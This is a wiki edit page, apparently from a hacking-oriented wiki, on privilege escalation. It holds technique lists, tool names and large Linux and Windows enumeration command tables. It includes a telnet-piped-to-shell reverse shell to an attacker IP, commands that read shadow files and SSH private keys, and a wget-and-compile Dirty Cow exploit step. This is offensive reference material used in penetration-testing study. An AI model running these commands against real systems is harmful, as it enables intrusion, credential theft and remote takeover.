Editing
Privilege Escalation
(section)
Jump to navigation
Jump to search
Warning:
You are not logged in. Your IP address will be publicly visible if you make any edits. If you
log in
or
create an account
, your edits will be attributed to your username, along with other benefits.
Anti-spam check. Do
not
fill this in!
= Privilege Escalation = Privilege escalation is the process of gaining higher-level permissions or access within a system after an initial foothold has been established. It plays a critical role in post-exploitation, allowing an attacker to move from a limited user account to administrative or root-level access β often enabling lateral movement, persistence, or full system compromise. Privilege escalation is typically divided into two categories: *vertical escalation* (gaining higher privileges) and *horizontal escalation* (gaining access to resources or accounts of equal privilege). Privilege escalation is rarely a one-step action β it follows a structured process: * '''Collect''' β Perform thorough enumeration across the system. * '''Process''' β Organize and analyze the data to identify promising leads. * '''Search''' β Identify known vulnerabilities and locate suitable exploit code. * '''Adapt''' β Customize the exploit to match the specific environment. * '''Try''' β Execute and iterate; exploitation often requires trial and error. == Operational Context == Privilege escalation typically follows successful [[Initial Access]], especially when the initial compromise grants access only to limited user accounts. This phase is crucial for: * Achieving administrative control (root, SYSTEM) * Enabling credential extraction and lateral movement * Bypassing sandboxed or containerized environments * Establishing persistence mechanisms (e.g., registry, startup tasks) == Vertical Privilege Escalation == Vertical escalation involves moving from a low-privileged account (e.g., www-data, local user) to a higher-privileged one (e.g., Administrator, SYSTEM, or root). === Common Techniques === * Exploiting kernel or driver vulnerabilities * Abusing misconfigured SUID/SGID binaries (Linux) * Misusing weak or world-writable service files * Leveraging unquoted service paths (Windows) * DLL hijacking or service misconfiguration * Stealing credentials from memory or config files * Abusing scheduled tasks or cron jobs * Exploiting insecure file permissions or ownership * Leveraging token impersonation or privilege tokens (Windows) * Dumping and cracking password hashes * Abusing Linux capabilities (e.g., cap_sys_admin) * Escaping weakly isolated Docker or LXC containers * Exploiting insecure ACLs or lack of integrity controls === Tools === * [[linPEAS]] (automated privilege escalation enumeration on Linux) * [[winPEAS]] (automated privilege escalation enumeration on Windows) * [[Seatbelt]] (Windows enumeration tool focused on privilege escalation) * [[PowerUp]] (PowerShell tool for Windows privilege escalation) * [[Watson]] (detects privilege escalation vectors on Windows) * [[BeRoot]] (privilege escalation auditor for Linux, MacOS, and Windows) * [[Linux Exploit Suggester]] (suggests kernel exploits) * [[Windows Exploit Suggester]] (suggests local exploits for Windows) * [[g0tmi1k's privesc checklist]] (manual enumeration and exploitation list) === Automated Exploitation Frameworks === * [[Metasploit]] (post modules for local privesc on Windows and Linux) * [[Exploit-DB SearchSploit]] (search for local exploits by kernel or OS version) * [[Evil-WinRM]] (post-exploitation over WinRM) == Horizontal Privilege Escalation == Horizontal escalation involves accessing other accounts, sessions, or resources at the same privilege level, typically through impersonation, session hijacking, or misconfigured file access. === Common Techniques === * Reading other usersβ sensitive files due to improper permissions * Accessing SSH keys, config files, or tokens * Hijacking user sessions (e.g., TTY snooping or credential reuse) * Exploiting insecure file-sharing configurations (e.g., SMB shares) * Abuse of API tokens or database credentials found in cleartext === Tools === * [[pspy]] (monitors Linux processes to detect privilege-related activity) * [[ls -la /home/]] (manual check for exposed user data) * [[ssh-agent hijacking scripts]] * [[procmon]] (process monitor for live file and registry activity on Windows) * [[mimikatz]] (extracts passwords, hashes, and tokens from memory) == Enumeration Checklists == === Linux Enumeration Commands === {| class="wikitable sortable" ! Purpose !! Command !! Potential Use in Privilege Escalation |- | SUID/SGID binaries || <code>find / -perm -4000 2>/dev/null</code> || May reveal misconfigured binaries that can be exploited for privilege escalation. |- | Kernel version || <code>uname -a</code> || Identifying vulnerable kernel versions that have known local privilege escalation exploits. |- | Environment variables || <code>env</code> || May expose sensitive paths or misconfigured variables usable in custom script execution. |- | Running processes || <code>ps aux</code> || Reveals running services or scripts running as root; useful for process injection or misconfigurations. |- | Installed packages (Debian) || <code>dpkg -l</code> || Can identify vulnerable software versions or unintended package installs. |- | Installed packages (Red Hat) || <code>rpm -qa</code> || Same as above, but for RPM-based systems. |- | Writable directories || <code>find / -writable 2>/dev/null</code> || Writable locations may allow backdoor placement, script replacement, or abuse in cron jobs. |- | Cron jobs || <code>cat /etc/crontab</code> || Look for jobs running as root or referencing writable scripts. |- | User info || <code>cat /etc/passwd</code> || Useful for identifying users, shell access, and potential privilege chaining. |- | Group info || <code>cat /etc/group</code> || Can show membership in sensitive groups like `sudo`, `docker`, or `adm`. |- | OS version info (Generic) || <code>cat /etc/issue</code> || Helps fingerprint system for targeted exploits. |- | OS version info (All common release files) || <code>cat /etc/*-release</code> || Same purpose β confirms distro and version for exploit matching. |- | OS version (Debian based) || <code>cat /etc/lsb-release</code> || Specifically useful for identifying Ubuntu/Debian versions. |- | OS version (Red Hat based) || <code>cat /etc/redhat-release</code> || Same, but for RHEL/CentOS systems. |- | Kernel version & architecture || <code>cat /proc/version # Shows detailed kernel version and build info</code><br> <code>uname -a # Displays all system info including kernel name and architecture</code><br> <code>uname -mrs # Prints kernel name, version, and hardware name</code><br> <code>rpm -q kernel # Lists installed kernel packages (RPM-based systems)</code><br> <code>dmesg | grep Linux # Extracts kernel-related boot messages</code><br> <code>ls /boot | grep vmlinuz- # Lists available kernel images in /boot</code> || Used to identify kernel-specific vulnerabilities and tailor exploits to system architecture. |- | Environment configuration files || <code>cat /etc/profile # System-wide environment variables</code><br> <code>cat /etc/bashrc # System-wide bash shell settings</code><br> <code>cat ~/.bash_profile # User-specific environment variables</code><br> <code>cat ~/.bashrc # User-specific bash shell settings</code><br> <code>cat ~/.bash_logout # Commands run at logout</code><br> <code>env # Print current environment variables</code> || Can reveal exposed credentials, custom paths, or insecure settings that can be leveraged for privilege escalation. |- | Printer services || <code>lpstat -a # Lists printers and their status</code> || May indicate running printer daemons or services with elevated privileges that can be misused or are misconfigured. |- | Running services & privileges || <code>ps aux # Lists all running processes with associated users</code> <code>ps -ef # Alternative view of all processes with full format</code><br> <code>top # Dynamic real-time process list</code><br> <code>cat /etc/services # Maps known services to their ports</code> || Helps identify active services and their privilege levels, which may include insecure or unnecessary daemons. |- | Root-owned services || <code>ps aux | grep root # Filters running processes owned by root</code> <code>ps -ef | grep root # Alternate full-format view of root-owned processes</code> || Useful for spotting services running as root that may be vulnerable or misconfigured β valuable targets for privilege escalation. |- | Installed applications & versions || <code>ls -alh /usr/bin/ # Lists applications and binaries in user path</code> <code>ls -alh /sbin/ # Lists system binaries</code><br> <code>dpkg -l # Lists installed packages (Debian-based systems)</code> <code>rpm -qa # Lists installed packages (RPM-based systems)</code> <code>ls -alh /var/cache/apt/archives # Shows downloaded .deb packages</code> <code>ls -alh /var/cache/yum/ # Shows cached .rpm packages</code> || Reveals software presence and versions β helpful for identifying vulnerable or exploitable programs that may be running. |- |- | Service config files || <code>cat /etc/syslog.conf # Syslog daemon configuration</code> <code>cat /etc/chttp.conf # Tiny HTTP server config</code> <code>cat /etc/lighttpd.conf # Lighttpd server config</code> <code>cat /etc/cups/cupsd.conf # Printing service config</code> <code>cat /etc/inetd.conf # Legacy super-server config</code> <code>cat /etc/apache2/apache2.conf # Apache main config (Debian-based)</code> <code>cat /etc/my.conf # MySQL config file</code> <code>cat /etc/httpd/conf/httpd.conf # Apache main config (RHEL-based)</code> <code>cat /opt/lampp/etc/httpd.conf # XAMPP's Apache config</code> <code>ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' # Lists readable files under /etc/ (potential misconfigurations)</code> || Checking these can reveal misconfigured services, overly permissive settings, or vulnerable modules that open attack vectors. |- | Scheduled jobs || <code>crontab -l # List current user's cron jobs</code> <code>ls -alh /var/spool/cron # View cron job files for users</code> <code>ls -al /etc/ | grep cron # Search for cron-related files</code> <code>ls -al /etc/cron* # List contents of cron directories</code> <code>cat /etc/cron* # Print content of all cron config files</code> <code>cat /etc/at.allow # Users allowed to use 'at'</code> <code>cat /etc/at.deny # Users denied from using 'at'</code> <code>cat /etc/cron.allow # Users allowed to use cron</code> <code>cat /etc/cron.deny # Users denied from using cron</code> <code>cat /etc/crontab # System-wide cron job definitions</code> <code>cat /etc/anacrontab # anacron job scheduler config</code> <code>cat /var/spool/cron/crontabs/root # Root's scheduled cron jobs</code> || Scheduled jobs may reveal tasks running as root, outdated scripts, or writable paths exploitable for privilege escalation. |- | Plaintext credentials || <code>grep -i user [filename] # Search for 'user' (case-insensitive)</code> <code>grep -i pass [filename] # Search for 'pass' (case-insensitive)</code> <code>grep -C 5 "password" [filename] # Show context around 'password'</code> <code>find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Look for hardcoded credentials in PHP files (e.g., Joomla)</code> || These patterns help uncover stored plaintext usernames or passwords in misconfigured or insecure code and config files. |- | Network interfaces || <code>/sbin/ifconfig -a # Show all network interfaces and their status</code> <code>cat /etc/network/interfaces # Network config (Debian-based)</code> <code>cat /etc/sysconfig/network # Network config (RHEL-based)</code> || Identifies available network interfaces and reveals if the system is connected to other networks β useful for lateral movement or pivoting. |- | Network configuration || <code>cat /etc/resolv.conf # Shows DNS servers</code> <code>cat /etc/sysconfig/network # Hostname, default gateway (RHEL-based)</code> <code>cat /etc/networks # Legacy network name mappings</code> <code>iptables -L # Lists firewall rules</code> <code>hostname # Shows system hostname</code> <code>dnsdomainname # Shows domain part of system's FQDN</code> || Helps reveal DNS, gateway, and firewall configuration β can indicate internal network structure and potential egress routes. |- | Active connections & services || <code>lsof -i # Lists open network connections</code> <code>lsof -i :80 # Check if web service is active</code> <code>grep 80 /etc/services # Maps port 80 to service name</code> <code>netstat -antup # Shows all TCP/UDP connections with PID</code> <code>netstat -antpx # Same with extended process info</code> <code>netstat -tulpn # All listening services with PID</code> <code>chkconfig --list # Lists services and runlevels</code> <code>chkconfig --list | grep 3:on # Services started in runlevel 3</code> <code>last # Login history of users</code> <code>w # Who is currently logged in</code> || Reveals running services, user activity, and possible internal communication β useful for identifying targets or attack surfaces. |- | Cached network data || <code>arp -e # ARP table (IP β MAC mappings)</code> <code>route # Kernel routing table</code> <code>/sbin/route -nee # Detailed routing info with interface names</code> || Displays cached IP and MAC addresses and routing paths β may expose other systems on the network or paths for movement. |- | Shell access & interaction || <code>nc -lvp 4444 # Attacker. Input (Commands)</code> <code>nc -lvp 4445 # Attacker. Output (Results)</code> <code>telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the target's system. Use the attacker's IP!</code> || Establishing an interactive shell can allow full control of the compromised system, enabling command execution and data exfiltration. |- | Tunneling & redirection || <code>ssh -D 127.0.0.1:9050 -N [username]@[ip] # Create SOCKS proxy for local tunneling</code> <code>proxychains ifconfig # Test command routing through proxy</code> || Useful for pivoting through the network or anonymizing outbound traffic via local or remote tunneling. |- | User identity & privilege || <code>id # Show current user ID and group</code> <code>who # List currently logged-in users</code> <code>w # Show who is logged in and what they are doing</code> <code>last # List recent user logins</code> <code>cat /etc/passwd | cut -d: -f1 # List of system users</code> <code>grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1 }' # Identify superuser accounts</code> <code>awk -F: '($3 == "0") {print}' /etc/passwd # Another way to list UID 0 accounts</code> <code>cat /etc/sudoers # View sudo privileges</code> <code>sudo -l # List current user's sudo rights</code> || Helps determine current privileges, available escalation paths, and visibility of other user accounts on the system. |- | Sensitive files || <code>cat /etc/passwd # User account information</code> <code>cat /etc/group # Group definitions</code> <code>cat /etc/shadow # Encrypted passwords (requires root)</code> <code>ls -alh /var/mail/ # User mailboxes, may contain sensitive data</code> || These files can expose system users, password hashes, and private data if permissions are misconfigured or access is gained through privilege escalation. |- | Home directory inspection || <code>ls -ahlR /root/ # Recursively list all files in root's home directory</code> <code>ls -ahlR /home/ # Recursively list all user home directories</code> || May reveal leftover files, misconfigured permissions, SSH keys, or credentials stored in plaintext. |- | Password storage in known files || <code>cat /var/apache2/config.inc # May contain hardcoded database credentials</code> <code>cat /var/lib/mysql/mysql/user.MYD # Raw MySQL user table data</code> <code>cat /root/anaconda-ks.cfg # Kickstart config file, often contains root password in plaintext</code> || These locations may store sensitive data such as database passwords or install-time credentials. |- | User activity & command history || <code>cat ~/.bash_history # Shell command history</code> <code>cat ~/.nano_history # Nano editor history</code> <code>cat ~/.atftp_history # atftp client history</code> <code>cat ~/.mysql_history # MySQL client history</code> <code>cat ~/.php_history # PHP interactive shell history</code> || Reviewing history files can expose credentials, database access, or other sensitive commands typed by the user. |- | Local user information || <code>cat ~/.bashrc # User shell configuration</code> <code>cat ~/.profile # User environment profile</code> <code>cat /var/mail/root # Root user's email inbox</code> <code>cat /var/spool/mail/root # Another root mail location</code> || These files may reveal environmental setups, messages with credentials, or scripts executed at login. |- | SSH key & config files || <code>cat ~/.ssh/authorized_keys # Allowed public keys for login</code> <code>cat ~/.ssh/identity.pub # Public key used for SSH auth</code> <code>cat ~/.ssh/identity # Private key (sensitive)</code> <code>cat ~/.ssh/id_rsa.pub # RSA public key</code> <code>cat ~/.ssh/id_rsa # RSA private key</code> <code>cat ~/.ssh/id_dsa.pub # DSA public key</code> <code>cat ~/.ssh/id_dsa # DSA private key</code> <code>cat /etc/ssh/ssh_config # SSH client configuration</code> <code>cat /etc/ssh/sshd_config # SSH daemon configuration</code> <code>cat /etc/ssh/ssh_host_dsa_key.pub # Host DSA public key</code> <code>cat /etc/ssh/ssh_host_dsa_key # Host DSA private key</code> <code>cat /etc/ssh/ssh_host_rsa_key.pub # Host RSA public key</code> <code>cat /etc/ssh/ssh_host_rsa_key # Host RSA private key</code> <code>cat /etc/ssh/ssh_host_key.pub # Legacy host public key</code> <code>cat /etc/ssh/ssh_host_key # Legacy host private key</code> || These files may expose private SSH keys, login credentials, or insecure configurations that enable unauthorized access. |- | Writable config files in /etc/ || <code>ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # World-writable files in /etc/</code> <code>ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner-writable files</code> <code>ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group-writable files</code> <code>ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other-writable files</code> <code>find /etc/ -readable -type f 2>/dev/null # All readable files in /etc/</code> <code>find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Readable top-level files only</code> || Writable configuration files may allow privilege escalation by altering service behavior or execution paths. |- | Contents of /var/ || <code>ls -alh /var/log # Logs from services and the system</code> <code>ls -alh /var/mail # Mailboxes for users</code> <code>ls -alh /var/spool # Scheduled tasks, print queues, and mail spools</code> <code>ls -alh /var/spool/lpd # Line printer daemon data</code> <code>ls -alh /var/lib/pgsql # PostgreSQL data directory</code> <code>ls -alh /var/lib/mysql # MySQL database directory</code> <code>cat /var/lib/dhcp3/dhclient.leases # DHCP lease information</code> || These directories may hold logs, mail, databases, or cached network info that could leak sensitive data or credentials. |- | Web directories and config files || <code>ls -alhR /var/www/ # Default web root on many systems</code> <code>ls -alhR /srv/www/htdocs/ # SUSE/openSUSE web root</code> <code>ls -alhR /usr/local/www/apache22/data/ # FreeBSD Apache web root</code> <code>ls -alhR /opt/lampp/htdocs/ # XAMPP web root</code> <code>ls -alhR /var/www/html/ # Common web root (e.g. CentOS, Ubuntu)</code> || Useful for discovering exposed config files, credentials, or sensitive content in hosted web applications. |- | Log file inspection || <code>cat /etc/httpd/logs/access_log # Apache access log</code> <code>cat /etc/httpd/logs/access.log # Apache access log alt path</code> <code>cat /etc/httpd/logs/error_log # Apache error log</code> <code>cat /etc/httpd/logs/error.log # Apache error log alt path</code> <code>cat /var/log/apache2/access_log # Apache2 access log</code> <code>cat /var/log/apache2/access.log # Apache2 access log alt path</code> <code>cat /var/log/apache2/error_log # Apache2 error log</code> <code>cat /var/log/apache2/error.log # Apache2 error log alt path</code> <code>cat /var/log/apache/access_log # Apache access log (alt)</code> <code>cat /var/log/apache/access.log # Apache access log (alt)</code> <code>cat /var/log/auth.log # Authentication events</code> <code>cat /var/log/chttp.log # cHTTP log</code> <code>cat /var/log/cups/error_log # Printer service log</code> <code>cat /var/log/dpkg.log # Package installation log (Debian)</code> <code>cat /var/log/faillog # Failed login attempts</code> <code>cat /var/log/httpd/access_log # Apache access log</code> <code>cat /var/log/httpd/access.log # Apache access log</code> <code>cat /var/log/httpd/error_log # Apache error log</code> <code>cat /var/log/httpd/error.log # Apache error log</code> <code>cat /var/log/lastlog # Last login of all users</code> <code>cat /var/log/lighttpd/access.log # Lighttpd access log</code> <code>cat /var/log/lighttpd/error.log # Lighttpd error log</code> <code>cat /var/log/lighttpd/lighttpd.access.log # Lighttpd alt access log</code> <code>cat /var/log/lighttpd/lighttpd.error.log # Lighttpd alt error log</code> <code>cat /var/log/messages # General system messages</code> <code>cat /var/log/secure # Security/authentication log</code> <code>cat /var/log/syslog # System log (Ubuntu, Debian)</code> <code>cat /var/log/wtmp # Login history (binary format)</code> <code>cat /var/log/xferlog # FTP file transfer log</code> <code>cat /var/log/yum.log # YUM package manager log</code> <code>cat /var/run/utmp # Current logins (binary format)</code> <code>cat /var/webmin/miniserv.log # Webmin log</code> <code>cat /var/www/logs/access_log # Apache access log (within web root)</code> <code>cat /var/www/logs/access.log # Apache access log (within web root)</code> <code>ls -alh /var/lib/dhcp3/ # DHCP lease and config files</code> <code>ls -alh /var/log/postgresql/ # PostgreSQL logs</code> <code>ls -alh /var/log/proftpd/ # FTP server logs</code> <code>ls -alh /var/log/samba/ # SMB service logs</code> || Reviewing log files may reveal usernames, passwords, visited URLs, session tokens, or useful paths for local file inclusion (LFI) or privilege escalation. |- | Shell escape techniques || <code>python -c 'import pty;pty.spawn("/bin/bash")' # Spawn interactive bash shell via Python</code> <code>echo os.system('/bin/bash') # Execute bash from within echo/os.system()</code> <code>/bin/sh -i # Interactive shell via /bin/sh</code> || Useful for escaping restricted shells or limited environments to gain a fully interactive session. |- | Mounted file-systems || <code>mount # Show all currently mounted file systems</code> <code>df -h # Show disk usage in human-readable format</code> || Reveals mounted volumes, file systems, and potential writable targets for persistence or data access. |- | Unmounted file-systems || <code>cat /etc/fstab # Configuration file for disk mounting at boot</code> || Shows devices intended for mounting β may reveal hidden partitions, backup volumes, or encrypted containers. |- | Advanced file permissions || <code>find / -perm -1000 -type d 2>/dev/null # Sticky bit directories (e.g., /tmp)</code> <code>find / -perm -g=s -type f 2>/dev/null # Files with SGID set</code> <code>find / -perm -u=s -type f 2>/dev/null # Files with SUID set</code> <code>find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID files</code> <code>for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Search *bin dirs for SGID/SUID</code> <code>find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null # Deep search for SUID/SGID, exclude symlinks</code> || SUID/SGID/sticky permissions are a common source of privilege escalation vectors, especially on older systems or misconfigured apps. |- | Writable & executable directories || <code>find / -writable -type d 2>/dev/null # World-writable directories</code> <code>find / -perm -222 -type d 2>/dev/null # Directories with write permission for anyone</code> <code>find / -perm -o w -type d 2>/dev/null # Same: world-writeable directories</code> <code>find / -perm -o x -type d 2>/dev/null # World-executable directories</code> <code>find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # Directories writable & executable by anyone</code> || Identifies folders where an attacker can drop binaries or scripts for execution β commonly abused for persistence and privilege escalation. |- | Problematic files & ownership || <code>find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # World-writable dirs without sticky bit</code> <code>find /dir -xdev \( -nouser -o -nogroup \) -print # Files with no valid user/group owner</code> || These can indicate misconfigured permissions, abandoned files, or opportunities to tamper with files belonging to no defined user. |- | Available dev tools & languages || <code>find / -name perl* # Locate Perl installations</code> <code>find / -name python* # Locate Python interpreters</code> <code>find / -name gcc* # Locate GNU Compiler Collection binaries</code> <code>find / -name cc # Locate C compiler</code> || Identifying available programming environments allows exploit code to be compiled or interpreted locally β essential for privilege escalation via code execution. |- | File upload capabilities || <code>find / -name wget # Check for file download via wget</code> <code>find / -name nc* # Netcat binaries</code> <code>find / -name netcat* # Alternative name for Netcat</code> <code>find / -name tftp* # TFTP client</code> <code>find / -name ftp # Basic FTP client</code> || Discovering which tools are present for file transfer helps determine how exploits, scripts, or reverse shells can be delivered to the system. |- | System patch level || <code>apt-get update && apt-get upgrade # Update package lists and upgrade all packages (Debian-based)</code> <code>yum update # Update all packages (RHEL-based)</code> || Helps determine if the system has known vulnerabilities due to missing patches. Unpatched systems are often exploitable through public CVEs. |} === Windows Enumeration Commands === {| class="wikitable sortable" ! Purpose !! Command |- | Whoami and privileges || <code>whoami /priv</code> |- | Local groups || <code>net localgroup administrators</code> |- | Services (CMD) || <code>sc query</code> |- | Services (PowerShell) || <code>Get-Service</code> |- | Startup registry keys || <code>reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run</code> |- | Scheduled tasks || <code>schtasks /query</code> |- | Installed programs || <code>wmic product get name</code> |- | Environment variables || <code>set</code> |- | File permissions (CMD) || <code>icacls</code> |- | File permissions (Sysinternals) || <code>accesschk</code> |} == Example: Local Kernel Exploit (Linux) == <syntaxhighlight lang="bash"> # Download and compile local privilege escalation exploit (example: Dirty Cow variant) wget https://www.exploit-db.com/download/40839 -O exploit.c gcc exploit.c -o exploit ./exploit # Output: spawns root shell if successful </syntaxhighlight> == Websites & References == * [https://gtfobins.github.io GTFOBins] (trusted repo of SUID/privilege escalation via Linux binaries) * [https://lolbas-project.github.io LOLBAS] (Living Off The Land Binaries and Scripts for Windows privilege escalation) * [https://book.hacktricks.xyz hacktricks.xyz] (comprehensive privilege escalation techniques for Linux and Windows) * [https://github.com/carlospolop/PEASS-ng PEASS-ng GitHub] (official PEAS suite repository) * [https://www.fuzzysecurity.com/tutorials/16.html FuzzySecurity Windows Privesc Guide] * [https://www.rebootuser.com/?p=1623 rebootuser's Linux privesc cheat sheet] == See Also == * [[Initial Access]] * [[Linux Post-Exploitation]] * [[Windows Post-Exploitation]] * [[Persistence]] * [[Credential Dumping]] * [[Exploitation Tools]]
Summary:
Please note that all contributions to HackOps may be edited, altered, or removed by other contributors. If you do not want your writing to be edited mercilessly, then do not submit it here.
You are also promising us that you wrote this yourself, or copied it from a public domain or similar free resource (see
HackOps:Copyrights
for details).
Do not submit copyrighted work without permission!
Cancel
Editing help
(opens in new window)
Navigation menu
Personal tools
Not logged in
Talk
Contributions
Create account
Log in
Namespaces
Page
Discussion
English
Views
Read
Edit
Edit source
View history
More
Search
Navigation
Tools
What links here
Related changes
Special pages
Page information